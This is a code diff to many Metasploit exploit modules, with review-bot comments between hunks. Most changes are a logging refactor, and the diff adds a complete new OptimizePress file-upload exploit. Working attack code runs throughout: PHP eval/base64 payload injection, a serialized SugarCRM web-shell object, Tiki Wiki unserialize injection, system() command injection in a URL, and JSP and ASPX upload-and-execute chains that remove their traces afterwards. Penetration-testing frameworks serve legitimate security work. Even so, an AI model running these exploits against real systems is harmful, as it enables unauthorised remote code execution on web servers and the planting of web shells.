@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
if res and res.headers['Set-Cookie']
cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
else
fail_with(Failure::Unknown, "#{@peer} - No cookie found, will not continue")
fail_with(Failure::Unknown, "#{peer} - No cookie found, will not continue")
end
cookie
@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote
login[name] = value
end
else
fail_with(Failure::Unknown, "#{@peer} - Unable to find the hidden fieldset required for login")
fail_with(Failure::Unknown, "#{peer} - Unable to find the hidden fieldset required for login")
end
# Add the rest of fields required for login
@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote
cookie_cred = "#{cookie}; #{user}; #{pass}"
else
cred = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}"
fail_with(Failure::Unknown, "#{@peer} - Unable to login with \"#{cred}\"")
fail_with(Failure::Unknown, "#{peer} - Unable to login with \"#{cred}\"")
end
return cookie_cred
@ -171,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote
fields[n] = v
end
else
fail_with(Failure::Unknown, "#{@peer} - Cannot get necessary fields before posting a comment")
fail_with(Failure::Unknown, "#{peer} - Cannot get necessary fields before posting a comment")
end
# Generate enough URLs to trigger spam logging
@ -206,18 +206,16 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
@peer = "#{rhost}:#{rport}"
@base = normalize_uri(target_uri.path)
@base << '/' if @base[-1, 1] != '/'
print_status("#{@peer} - Getting cookie")
print_status("#{peer} - Getting cookie")
cookie = get_cookie
print_status("#{@peer} - Logging in")
print_status("#{peer} - Logging in")
cred = login(cookie)
print_status("#{@peer} - Triggering spam logging")
print_status("#{peer} - Triggering spam logging")
inject_exec(cred)
handler


@ -86,9 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
@peer = "#{rhost}:#{rport}"
print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code")
print_status("#{peer} - Exploiting the preg_replace() to execute PHP code")
res = send_injection("#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//")
end
end


@ -64,12 +64,11 @@ class Metasploit3 < Msf::Exploit::Remote
@uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/'
@session_id = ""
@peer = "#{rhost}:#{rport}"
login
if not @session_id or @session_id.empty?
print_error "#{@peer} - Authentication failed"
print_error "#{peer} - Authentication failed"
return Exploit::CheckCode::Unknown
end
@ -105,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote
if res and res.code == 303
@session_id = res["Set-Cookie"]
print_good "#{@peer} - Authentication successful"
print_good "#{peer} - Authentication successful"
end
end
@ -113,17 +112,16 @@ class Metasploit3 < Msf::Exploit::Remote
@uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/'
@session_id = ""
@peer = "#{rhost}:#{rport}"
print_status "#{@peer} - Trying login"
print_status "#{peer} - Trying login"
login
if not @session_id or @session_id.empty?
print_error "#{@peer} - Authentication failed"
print_error "#{peer} - Authentication failed"
return
end
print_status "#{@peer} - Authentication successfully, trying to exploit"
print_status "#{peer} - Authentication successfully, trying to exploit"
data = "rs=passthru&"
data << "rsargs[]=#{rand_text_alpha(rand(4) + 4)}&"
@ -140,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
})
if not res or res.code != 200 or not res.body =~ /\+/
print_error "#{@peer} - Exploitation failed"
print_error "#{peer} - Exploitation failed"
return
end


@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def cookie_prefix
print_status("#{@peer} - Checking for cookie prefix")
print_status("#{peer} - Checking for cookie prefix")
cookie_prefix = ""
res = send_request_cgi(
{
@ -76,14 +76,13 @@ class Metasploit3 < Msf::Exploit::Remote
})
if res and res.code == 200 and res.headers['Set-Cookie'] =~ /(.+)session/
print_status("#{@peer} - Cookie prefix #{$1} found")
print_status("#{peer} - Cookie prefix #{$1} found")
cookie_prefix = $1
end
return cookie_prefix
end
def check
@peer = "#{rhost}:#{rport}"
check_str = Rex::Text.uri_encode('a:1:{i:0;O:1:"x":0:{}}')
res = send_request_cgi(
{
@ -105,18 +104,17 @@ class Metasploit3 < Msf::Exploit::Remote
if client.type == "meterpreter"
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
begin
print_warning("#{@peer} - Deleting #{@upload_php}")
print_warning("#{peer} - Deleting #{@upload_php}")
client.fs.file.rm(@upload_php)
print_good("#{@peer} - #{@upload_php} removed to stay ninja")
print_good("#{peer} - #{@upload_php} removed to stay ninja")
rescue
print_error("#{@peer} - Unable to remove #{f}")
print_error("#{peer} - Unable to remove #{f}")
end
end
end
def exploit
@upload_php = rand_text_alpha(rand(4) + 4) + ".php"
@peer = "#{rhost}:#{rport}"
# get_write_exec_payload uses a function, which limits our ability to support
# Linux payloads, because that requires a space:
@ -131,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
db_driver_mysql = "a:1:{i:0;O:15:\"db_driver_mysql\":1:{s:3:\"obj\";a:2:{s:13:\"use_debug_log\";i:1;s:9:\"debug_log\";s:#{"cache/#{@upload_php}".length}:\"cache/#{@upload_php}\";}}}"
print_status("#{@peer} - Exploiting the unserialize() to upload PHP code")
print_status("#{peer} - Exploiting the unserialize() to upload PHP code")
res = send_request_cgi(
{
@ -141,16 +139,16 @@ class Metasploit3 < Msf::Exploit::Remote
})
if not res or res.code != 200
print_error("#{@peer} - Exploit failed: #{res.code}")
print_error("#{peer} - Exploit failed: #{res.code}")
return
end
print_status("#{@peer} - Executing the payload #{@upload_php}")
print_status("#{peer} - Executing the payload #{@upload_php}")
res = send_request_raw({'uri' => "#{base}cache/#{@upload_php}"})
if res
print_error("#{@peer} - Payload execution failed: #{res.code}")
print_error("#{peer} - Payload execution failed: #{res.code}")
return
end
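Review bot: The rewritten error line `print_error("#{peer} - Exploit failed: #{res.code}")` sits under `if not res or res.code != 200`, so on the nil branch the interpolation calls `code` on nil and raises `NoMethodError` instead of printing the error; use `print_error("#{peer} - Exploit failed: #{res ? res.code : 'no response'}")`. The same construct is rewritten in the SugarCRM and Tiki Wiki sections below (`print_error("#{peer} - Exploit failed: #{res.code}")` and the Multiprint variant), which need the same guard. Separately, the cleanup handler's `print_error("#{peer} - Unable to remove #{f}")` references `f` while the method deletes `@upload_php`; unless `f` is defined earlier in that method (its start is outside the hunk), the rescue branch raises `NameError` and the message should use `@upload_php`, as should the identical line in the Tiki Wiki cleanup handler. The enclosing `exploit` method also continues outside the hunk.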


@ -26,8 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'Author' =>
[
'drone (@dronesec)', # Discovery and PoC
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
'drone', # Discovery and PoC
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit module
],
'References' =>
[


@ -93,24 +93,24 @@ class Metasploit3 < Msf::Exploit::Remote
base = target_uri.path
base << '/' if base[-1, 1] != '/'
@peer = "#{rhost}:#{rport}"
code = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded+"&"))
rand_key_value = rand_text_alphanumeric(rand(10)+6)
# send payload
print_status("#{@peer} - Sending payload (#{code.length} bytes)")
print_status("#{peer} - Sending payload (#{code.length} bytes)")
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}"
})
if res and res.code == 500
print_good("#{@peer} - Payload sent successfully")
print_good("#{peer} - Payload sent successfully")
else
fail_with(Failure::UnexpectedReply, "#{@peer} - Sending payload failed")
fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
end


@ -0,0 +1,147 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'uri'
class Metasploit3 < Msf::Exploit::Remote
include Msf::HTTP::Wordpress
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress OptimizePress Theme File Upload Vulnerability',
'Description' => %q{
This module exploits a vulnerability found in the the Wordpress theme OptimizePress. The
vulnerability is due to an insecure file upload on the media-upload.php component, allowing
an attacker to upload arbitrary PHP code. This module has been tested successfully on
OptimizePress 1.45.
},
'Author' =>
[
'United of Muslim Cyber Army', # Vulnerability discovery
'Mekanismen' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', "http://www.osirt.com/2013/11/wordpress-optimizepress-hack-file-upload-vulnerability/" ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [ ['OptimizePress', {}] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 29 2013'
))
register_advanced_options(
[
OptString.new('THEMEDIR', [ true, 'OptimizePress Theme directory', 'OptimizePress'])
])
end
def check
uri = target_uri.path
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php')
})
if res and res.code == 200 and res.body.to_s =~ /Upload New Image/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
uri = normalize_uri(target_uri.path)
#get upload filepath
print_status("#{peer} - Getting the upload path...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php')
})
unless res and res.code == 200
fail_with(Failure::Unknown, "#{peer} - Unable to access vulnerable URL")
end
if res.body =~ /<input name="imgpath" type="hidden" id="imgpath" value="(.*)" \/>/
file_path = $1
else
fail_with(Failure::Unknown, "#{peer} - Unable to get upload filepath")
end
#set cookie
cookie = res.get_cookies
filename = rand_text_alphanumeric(8) + ".php"
#upload payload
post_data = Rex::MIME::Message.new
post_data.add_part("<?php #{payload.encoded} ?>", "application/octet-stream", nil, "form-data; name=\"newcsimg\"; filename=\"#(unknown)\"")
post_data.add_part("Upload File", nil, nil, "form-data; name=\"button\"")
post_data.add_part("1", nil, nil, "form-data; name=\"newcsimg\"")
post_data.add_part("#{file_path}", nil, nil, "form-data; name=\"imgpath\"")
print_status("#{peer} - Uploading PHP payload...")
n_data = post_data.to_s
n_data = n_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php'),
'ctype' => 'multipart/form-data; boundary=' + post_data.bound,
'data' => n_data,
'headers' => {
'Referer' => "#{uri}/wp-content/themes/OptimizePress/lib/admin/media-upload.php"
},
'cookie' => cookie
})
unless res and res.code == 200
fail_with(Failure::Unknown, "#{peer} - Unable to upload payload")
end
print_good("#{peer} - Payload uploaded successfully. Disclosing the payload path...")
#get path to payload
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php')
})
unless res and res.code == 200
fail_with(Failure::Unknown, "#{peer} - Unable to access vulnerable URL")
end
payload_url = ""
if res.body =~ /name="cs_img" value="(.*#(unknown).*)" \/> <span/
payload_url =$1
else
fail_with(Failure::Unknown, "#{peer} - Unable to deliver the payload")
end
begin
u = URI(payload_url)
rescue ::URI::InvalidURIError
fail_with(Failure::Unknown, "#{peer} - Unable to deliver the payload, #{payload_url} isn't an URL'")
end
register_files_for_cleanup(File::basename(u.path))
print_good("#{peer} - Our payload is at: #{u.path}! Executing payload...")
send_request_cgi({
'method' => 'GET',
'uri' => u.path
})
end
end
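Review bot: The `Referer` header in the upload request hard-codes the theme directory (`"#{uri}/wp-content/themes/OptimizePress/lib/admin/media-upload.php"`) while every other path in the module is built from `datastore['THEMEDIR']`, so a non-default THEMEDIR sends an inconsistent referer; use `'Referer' => "#{uri}/wp-content/themes/#{datastore['THEMEDIR']}/lib/admin/media-upload.php"`. As rendered, the multipart part header and the `cs_img` regex contain `#(unknown)` where the `filename` local defined just above would be expected, which looks like a page rendering artifact but is worth confirming against the source (`filename=\"#{filename}\"`). The failure message `isn't an URL'` carries a stray trailing quote and should read `isn't a URL`. `check` returns `Safe` when `res` is nil, which conflates "no response" with "not vulnerable"; `Exploit::CheckCode::Unknown` is the accurate code for that case.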


@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_raw({'uri' => "#{base}/tools#{uri}"})
if res and res.code == 404
print_error("#{@peer} - The upload most likely failed")
print_error("#{peer} - The upload most likely failed")
return
end
@ -110,8 +110,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
@peer = "#{rhost}:#{rport}"
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.")
@ -125,15 +123,15 @@ class Metasploit3 < Msf::Exploit::Remote
p = get_write_exec_payload(:unlink_self=>true)
print_status("#{@peer} - Uploading PHP payload (#{p.length.to_s} bytes)...")
print_status("#{peer} - Uploading PHP payload (#{p.length.to_s} bytes)...")
res = upload_php(base, php_fname, p, folder_name)
if not res
print_error("#{@peer} - No response from server")
print_error("#{peer} - No response from server")
return
end
print_status("#{@peer} - Executing '#{php_fname}'...")
print_status("#{peer} - Executing '#{php_fname}'...")
exec_php(base, res)
end
end


@ -63,11 +63,11 @@ class Metasploit3 < Msf::Exploit::Remote
f = "pathCache.php"
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
begin
print_warning("#{@peer} - Deleting #{f}")
print_warning("#{peer} - Deleting #{f}")
client.fs.file.rm(f)
print_good("#{@peer} - #{f} removed to stay ninja")
print_good("#{peer} - #{f} removed to stay ninja")
rescue
print_error("#{@peer} - Unable to remove #{f}")
print_error("#{peer} - Unable to remove #{f}")
end
end
end
@ -75,7 +75,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
base = normalize_uri(target_uri.path)
@peer = "#{rhost}:#{rport}"
username = datastore['USERNAME']
password = datastore['PASSWORD']
@ -97,18 +96,18 @@ class Metasploit3 < Msf::Exploit::Remote
})
if not res or res.headers['Location'] =~ /action=Login/ or not res.headers['Set-Cookie']
print_error("#{@peer} - Login failed with \"#{username}:#{password}\"")
print_error("#{peer} - Login failed with \"#{username}:#{password}\"")
return
end
if res.headers['Set-Cookie'] =~ /PHPSESSID=([A-Za-z0-9]*); path/
session_id = $1
else
print_error("#{@peer} - Login failed with \"#{username}:#{password}\" (No session ID)")
print_error("#{peer} - Login failed with \"#{username}:#{password}\" (No session ID)")
return
end
print_status("#{@peer} - Login successful with #{username}:#{password}")
print_status("#{peer} - Login successful with #{username}:#{password}")
data = "module=Contacts&"
data << "Contacts2_CONTACT_offset=1&"
@ -116,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote
#O:10:"SugarTheme":2:{s:10:"*dirName";s:5:"../..";s:20:"SugarTheme_jsCache";s:49:"<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>";}
data << "TzoxMDoiU3VnYXJUaGVtZSI6Mjp7czoxMDoiACoAZGlyTmFtZSI7czo1OiIuLi8uLiI7czoyMDoiAFN1Z2FyVGhlbWUAX2pzQ2FjaGUiO3M6NDk6Ijw/cGhwIGV2YWwoYmFzZTY0X2RlY29kZSgkX1NFUlZFUltIVFRQX0NNRF0pKTsgPz4iO30="
print_status("#{@peer} - Exploiting the unserialize()")
print_status("#{peer} - Exploiting the unserialize()")
res = send_request_cgi(
{
@ -130,11 +129,11 @@ class Metasploit3 < Msf::Exploit::Remote
})
if not res or res.code != 200
print_error("#{@peer} - Exploit failed: #{res.code}")
print_error("#{peer} - Exploit failed: #{res.code}")
return
end
print_status("#{@peer} - Executing the payload")
print_status("#{peer} - Executing the payload")
res = send_request_cgi(
{
@ -146,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
})
if res
print_error("#{@peer} - Payload execution failed: #{res.code}")
print_error("#{peer} - Payload execution failed: #{res.code}")
return
end


@ -66,11 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote
if client.type == "meterpreter"
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
begin
print_warning("#{@peer} - Deleting #{@upload_php}")
print_warning("#{peer} - Deleting #{@upload_php}")
client.fs.file.rm(@upload_php)
print_good("#{@peer} - #{@upload_php} removed to stay ninja")
print_good("#{peer} - #{@upload_php} removed to stay ninja")
rescue
print_error("#{@peer} - Unable to remove #{f}")
print_error("#{peer} - Unable to remove #{f}")
end
end
end
@ -79,9 +79,8 @@ class Metasploit3 < Msf::Exploit::Remote
base = target_uri.path
base << '/' if base[-1, 1] != '/'
@upload_php = rand_text_alpha(rand(4) + 4) + ".php"
@peer = "#{rhost}:#{rport}"
print_status("#{@peer} - Disclosing the path of the Tiki Wiki on the filesystem")
print_status("#{peer} - Disclosing the path of the Tiki Wiki on the filesystem")
res = send_request_cgi(
'uri' => normalize_uri(base, "tiki-rss_error.php")
@ -92,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote
return
else
tiki_path = $1
print_good "#{@peer} - Tiki Wiki path disclosure: #{tiki_path}"
print_good "#{peer} - Tiki Wiki path disclosure: #{tiki_path}"
end
php_payload = "<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>"
@ -106,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote
printpages << "{s:4:\"name\";s:#{php_payload.length}:\"#{php_payload}\";}}"
printpages << "s:9:\"%00*%00_files\";O:8:\"stdClass\":0:{}}}"
print_status("#{@peer} - Exploiting the unserialize() to upload PHP code")
print_status("#{peer} - Exploiting the unserialize() to upload PHP code")
res = send_request_cgi(
{
@ -118,11 +117,11 @@ class Metasploit3 < Msf::Exploit::Remote
})
if not res or res.code != 200
print_error("#{@peer} - Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.")
print_error("#{peer} - Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.")
return
end
print_status("#{@peer} - Executing the payload #{@upload_php}")
print_status("#{peer} - Executing the payload #{@upload_php}")
res = send_request_cgi(
{
@ -134,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote
})
if res
print_error("#{@peer} - Payload execution failed: #{res.code}")
print_error("#{peer} - Payload execution failed: #{res.code}")
return
end


@ -98,8 +98,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
@peer = "#{rhost}:#{rport}"
base = target_uri.path
base << '/' if base[-1, 1] != '/'
cookie = "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6)
@ -109,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote
command = Rex::Text.uri_encode(payload.encoded)
# login
print_status("#{@peer} - Authenticating as user '#{user}'")
print_status("#{peer} - Authenticating as user '#{user}'")
begin
res = send_request_cgi({
'method' => 'POST',
@ -118,15 +116,15 @@ class Metasploit3 < Msf::Exploit::Remote
'data' => "#{data}",
})
if !res or res.code != 200 or res.body =~ /<title>ZM - Login<\/title>/
fail_with(Failure::NoAccess, "#{@peer} - Authentication failed")
fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
print_good("#{@peer} - Authenticated successfully")
print_good("#{peer} - Authenticated successfully")
# send payload
print_status("#{@peer} - Sending payload (#{command.length} bytes)")
print_status("#{peer} - Sending payload (#{command.length} bytes)")
begin
res = send_request_cgi({
'method' => 'POST',
@ -135,12 +133,12 @@ class Metasploit3 < Msf::Exploit::Remote
'cookie' => "#{cookie}"
})
if res and res.code == 200
print_good("#{@peer} - Payload sent successfully")
print_good("#{peer} - Payload sent successfully")
else
fail_with(Failure::UnexpectedReply, "#{@peer} - Sending payload failed")
fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
end


@ -22,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => "MS12-022 Microsoft Silverlight ScriptObject Unsafe Memory Access",
'Description' => %q{
This module exploits a vulnerability on Microsoft Silverlight. The vulnerability exists on
This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists on
the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an
unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible
to dereference arbitrary memory which easily leverages to arbitrary code execution. In order


@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Targets' =>
[
# XP SP3 + Office 2010 Standard (14.0.6023.1000 32-bit)
['Windows XP SP3 with Office Starndard 2010', {}],
['Windows XP SP3 with Office Standard 2010', {}],
],
'Privileged' => false,
'DisclosureDate' => "Nov 5 2013", # Microsoft announcement


@ -63,9 +63,9 @@ class Metasploit3 < Msf::Exploit::Remote
cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
begin
print_warning("#{@peer} - Removing #{@payload_path}")
print_warning("#{peer} - Removing #{@payload_path}")
cli.fs.file.rm(@payload_path)
print_good("#{@peer} - #{@payload_path} deleted")
print_good("#{peer} - #{@payload_path} deleted")
rescue ::Exception => e
print_error("Unable to delete #{@payload_path}: #{e.message}")
end
@ -73,9 +73,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
@peer = "#{rhost}:#{rport}"
# Generate the ASPX containing the EXE containing the payload
exe = generate_payload_exe
aspx = Msf::Util::EXE.to_exe_aspx(exe)
@ -128,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote
# UPLOAD
#
attack_url = uri_path + "CCRWebClient/Wallboard/ImageUpload.ashx"
print_status("#{@peer} - Uploading #{aspx_b64.length} bytes through #{attack_url}...")
print_status("#{peer} - Uploading #{aspx_b64.length} bytes through #{attack_url}...")
res = send_request_cgi({
'uri' => attack_url,
@ -140,9 +137,9 @@ class Metasploit3 < Msf::Exploit::Remote
payload_url = ""
@payload_path = ""
if res and res.code == 200 and res.body =~ /"Key":"RadUAG_success","Value":true/
print_good("#{@peer} - Payload uploaded successfuly")
print_good("#{peer} - Payload uploaded successfuly")
else
print_error("#{@peer} - Payload upload failed")
print_error("#{peer} - Payload upload failed")
return
end
@ -150,15 +147,15 @@ class Metasploit3 < Msf::Exploit::Remote
if res.body =~ /\{"Key":"RadUAG_filePath","Value":"(.*)"\},\{"Key":"RadUAG_associatedData/
@payload_path = $1
print_status("#{@peer} - Payload stored on #{@payload_path}")
print_status("#{peer} - Payload stored on #{@payload_path}")
else
print_error("#{@peer} - The payload file path couldn't be retrieved")
print_error("#{peer} - The payload file path couldn't be retrieved")
end
if res.body =~ /\[\{"Key":"UploadedImageURL","Value":"(.*)"\}\]/
payload_url = URI($1).path
else
print_error("#{@peer} - The payload URI couldn't be retrieved... Aborting!")
print_error("#{peer} - The payload URI couldn't be retrieved... Aborting!")
return
end
@ -166,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote
#
# EXECUTE
#
print_status("#{@peer} - Executing #{payload_url}...")
print_status("#{peer} - Executing #{payload_url}...")
res = send_request_cgi({
'uri' => payload_url,
@ -174,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote
}, 20)
if (!res or (res and res.code != 200))
print_error("#{@peer} - Execution failed on #{payload_url} [No Response]")
print_error("#{peer} - Execution failed on #{payload_url} [No Response]")
return
end


@ -68,8 +68,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
@peer = "#{rhost}:#{rport}"
# New lines are handled on the vuln app and payload is corrupted
jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
@ -86,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
data = post_data.to_s
data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")
print_status("#{@peer} - Uploading the JSP payload...")
print_status("#{peer} - Uploading the JSP payload...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, "webdm", "mibbrowser", "mibFileUpload"),
'method' => 'POST',
@ -96,13 +94,13 @@ class Metasploit3 < Msf::Exploit::Remote
})
if res and res.code == 200 and res.body.empty?
print_status("#{@peer} - JSP payload uploaded successfully")
print_status("#{peer} - JSP payload uploaded successfully")
register_files_for_cleanup(jsp_name)
else
fail_with(Failure::Unknown, "#{@peer} - JSP payload upload failed")
fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
end
print_status("#{@peer} - Executing payload...")
print_status("#{peer} - Executing payload...")
send_request_cgi({
'uri' => normalize_uri(jsp_name),
'method' => 'GET'
